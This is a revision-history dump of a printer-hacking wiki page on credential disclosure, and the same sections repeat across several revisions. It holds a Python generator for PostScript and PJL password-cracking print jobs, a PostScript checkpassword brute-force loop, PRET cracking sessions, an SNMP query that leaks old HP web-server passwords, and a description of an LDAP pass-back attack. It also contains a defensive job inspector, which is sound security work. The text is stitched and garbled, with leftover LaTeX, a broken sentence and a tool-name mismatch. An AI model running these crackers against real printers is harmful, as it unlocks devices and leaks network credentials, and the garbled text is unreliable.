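    for b in raw:
        if b in b"()\\":
            out += b"\\" + bytes([b])
        elif 0x20 <= b < 0x7F:
            out.append(b)
        else:
            out += b"\\%03o" % b
    out += b")"
    return bytes(out)


def ps_cracker_job(candidates) -> bytes:
    """PostScript job that feeds every candidate to checkpassword.

    Candidates may be ints or bytes (wordlist entries).  Like the numeric
    cracker on this page, the interpreter prints the first match to the
    back channel and stops; without a back channel the password stays
    unknown but the loop still runs to completion on the device."""
    literals = b" ".join(
        b"%d" % c if isinstance(c, int) else ps_string(c) for c in candidates)
    return (
        b"%!PS\n"
        b"statusdict begin\n"
        b"{ [ " + literals + b" ]\n"
        b"  { dup checkpassword { == flush stop } { pop } ifelse } forall\n"
        b"} stopped pop\n"
        b"end\n"
    )


if __name__ == "__main__":
    # Constructed wordlist; a real run would read it from a file.
    print(ps_cracker_job([999, b"admin", b"Br(oken)\\pw"]).decode())
    print(len(pjl_blind_unlock_job()), "bytes for the full PJL key space")
```

The PostScript variant is only useful with a back channel (port 9100 echoes ''=='' output) or when combined with a second step that uses the found password, for example ''setsystemparams'' with the candidate on the stack; the PJL variant needs neither, because its payload is the unlock itself.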
'''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. 
This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- 94f2c76a110b2951a4b5c55c41faa55ba005cd51 189 188 2017-01-22T19:16:59Z Admin 1 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 
1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be verfied per second leading to average cracking times between 30 seconds and ten minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. 
Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. 
'''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- cfd4191c07c46e2178a2a83bac17bb53e9bba299 188 187 2017-01-22T12:22:36Z Admin 1 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. 
The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === One remarkable class of attacks to be mentioned is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. 
Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname without setting a new password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. == Brute-Force Attacks == Besides credentials leaked from sources like [[#SNMP|SNMP]], the printer's [[#Pass-Back|embedded web server]], [[File system access|file system]] or [[memory access]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. 
In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' The ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. 
PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. 
On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' In case of numeric (integer) passwords, the ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. 
---- 02b783c7d35c4f09bfe4bfe76688c0b22e4fb572 187 185 2017-01-22T12:18:23Z Admin 1 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === One remarkable class of attacks to be mentioned is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. 
If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname without setting a new password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. == Brute-Force Attacks == Besides credentials leaked from sources like [[#SNMP|SNMP]], the printer's [[#Pass-Back|embedded web server]], [[File system access|file system]] or [[memory access]] printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. 
The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. 
With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' The ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. 
The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,535 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>, which theoretically allows 524,280 bit passwords. On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
% candidate range: every integer from min to max
/min 0 def /max 1000000 def
statusdict begin
% checkpassword returns true for a valid password; print it and stop the loop
{ min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother-based devices are exceptions, as ''BR-Script'' only accepts one password per second but also checks only the very first character of the password, which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all.

'''How to test this attack?'''

In case of numeric (integer) passwords, the ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PostScript passwords:
<syntaxhighlight lang=text>
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Found password: 999
</syntaxhighlight>

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.
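Both attacks above leave a recognisable shape in the raw job: a PJL header that cycles through many PASSWORD values (the blind "all 65535 combinations in one job" approach), or a PostScript body that calls ''checkpassword'' inside a loop. The inspector below is an added example written for this page, not part of PRET or any vendor tool; its thresholds are arbitrary and the three sample jobs are constructed (the PostScript one simply wraps the cracker shown above), so a defender capturing port 9100 traffic or spool files can run it offline:

```python
"""Inspect raw print jobs for the brute-force patterns described above.

Added example for this wiki page; not part of PRET or any vendor tooling.
It looks for two shapes in a captured job (port 9100 stream, spool file):
  * PJL: one job that cycles through many PASSWORD values
  * PostScript: checkpassword called inside a looping construct
Thresholds and the sample jobs at the bottom are constructed, not captured.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set

# Universal Exit Language: brackets the PJL part of a raw job.
UEL = b"\x1b%-12345X"

# @PJL JOB/DEFAULT/SET PASSWORD=<1..65535>
PJL_PASSWORD_RE = re.compile(
    rb"@PJL\s+(?:JOB|DEFAULT|SET)\s+PASSWORD\s*=\s*(\d+)", re.IGNORECASE)
# The protections the password guards: disk lock and control panel lock.
PJL_LOCK_RE = re.compile(
    rb"@PJL\s+(?:DEFAULT|SET)\s+(DISKLOCK|CPLOCK)\s*=\s*(ON|OFF)", re.IGNORECASE)
# PostScript operators; the lookbehind keeps /name literals from matching.
PS_CHECKPASSWORD_RE = re.compile(rb"(?<![\w/])checkpassword\b")
PS_LOOP_RE = re.compile(rb"(?<![\w/])(?:for|loop|repeat|forall)\b")


@dataclass
class Report:
    pjl_password_values: Set[int] = field(default_factory=set)
    pjl_lock_changes: List[str] = field(default_factory=list)
    ps_checkpassword_calls: int = 0
    ps_loop_operators: int = 0
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def strip_ps_comments(data: bytes) -> bytes:
    """Remove %-comments (DSC headers, UEL remainder) before operator matching."""
    return re.sub(rb"%[^\r\n]*", b"", data)


def inspect_job(job: bytes, max_distinct_pjl_passwords: int = 3) -> Report:
    """Return a Report; Report.suspicious is True if a brute-force shape was seen."""
    report = Report()

    # PJL header: collect every PASSWORD value and every lock change.
    for m in PJL_PASSWORD_RE.finditer(job):
        report.pjl_password_values.add(int(m.group(1)))
    for m in PJL_LOCK_RE.finditer(job):
        report.pjl_lock_changes.append(
            f"{m.group(1).decode().upper()}={m.group(2).decode().upper()}")

    n_pw = len(report.pjl_password_values)
    if n_pw > max_distinct_pjl_passwords:
        report.findings.append(
            f"PJL: {n_pw} distinct PASSWORD values in one job (key space is only 1..65535)")
    if n_pw > 1 and any(c.endswith("=OFF") for c in report.pjl_lock_changes):
        report.findings.append("PJL: DISKLOCK/CPLOCK switched OFF after multiple PASSWORD values")

    # PostScript body: checkpassword plus a loop operator is the on-device cracker.
    body = strip_ps_comments(job)
    report.ps_checkpassword_calls = len(PS_CHECKPASSWORD_RE.findall(body))
    report.ps_loop_operators = len(PS_LOOP_RE.findall(body))
    if report.ps_checkpassword_calls and report.ps_loop_operators:
        report.findings.append("PostScript: checkpassword used together with a loop operator")
    return report


# --- constructed sample jobs (not captured from real devices) ---

# A legitimate job: one PIN, lock enabled, then a page of PostScript.
BENIGN_JOB = (
    UEL + b"@PJL JOB PASSWORD=12345\r\n"
    b"@PJL DEFAULT DISKLOCK=ON\r\n"
    b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    b"%!PS-Adobe-3.0\r\n"
    b"/Helvetica findfont 12 scalefont setfont 72 720 moveto (Hello) show showpage\r\n"
    + UEL
)

# The shape of the blind PJL attack: many PINs in one job, each followed by a
# lock change (12 candidates here instead of all 65535).
PJL_GUESSING_JOB = UEL + b"".join(
    b"@PJL JOB PASSWORD=%d\r\n@PJL DEFAULT DISKLOCK=OFF\r\n" % pin for pin in range(1, 13)
) + UEL

# The PostScript cracker quoted on this page, wrapped as a job.
PS_CRACKER_JOB = (
    UEL + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    b"%!PS\r\n"
    b"/min 0 def /max 1000000 def\r\n"
    b"statusdict begin\r\n"
    b"{ min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop\r\n"
    + UEL
)

if __name__ == "__main__":
    for name, job in [("benign", BENIGN_JOB), ("pjl-guessing", PJL_GUESSING_JOB),
                      ("ps-cracker", PS_CRACKER_JOB)]:
        r = inspect_job(job)
        print(f"{name}: suspicious={r.suspicious} findings={r.findings}")
```

Run as a script it prints one verdict per sample; in practice the input is a job pulled from a spool directory or reassembled from a port 9100 capture. The thresholds are deliberately low because a legitimate job sets at most one PIN, so any job that both cycles PASSWORD values and flips DISKLOCK or CPLOCK is worth an alert; a job only a few hundred kilobytes in size can already carry the full 65535-value sweep, so size alone is not a useful indicator.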
One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating. If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. 
